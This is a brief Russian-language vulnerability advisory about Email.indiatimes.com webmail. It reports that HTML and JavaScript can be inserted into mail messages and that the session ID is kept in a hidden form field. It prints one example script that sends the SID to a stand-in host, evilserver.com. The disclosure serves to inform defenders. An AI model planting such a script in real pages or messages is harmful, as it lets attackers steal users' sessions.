Email.indiatimes.com - популярная система Web почты от газеты 'The Times of India'. Сценарии, используемые на Web сайте, позволяют пользователям вставлять HTML или JavaScript код в почтовые сообщения. Злонамеренный код, вставленный в электронное сообщение, может использоваться для похищения опознавательных мандатов (хотя сайт не использует куки, SID пользователя хранится в поле формы): 

<Form name=Rform ...>
<input type=hidden name=SID value="some_random_number:> </form>

Этот SID - единственный маркер, использующийся для подтверждения подлинности пользователя). 

Пример: 

<script> 
self.location.href="http://evilserver.com/evil.cgi?SID="+Rform.SID.value
</script>

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии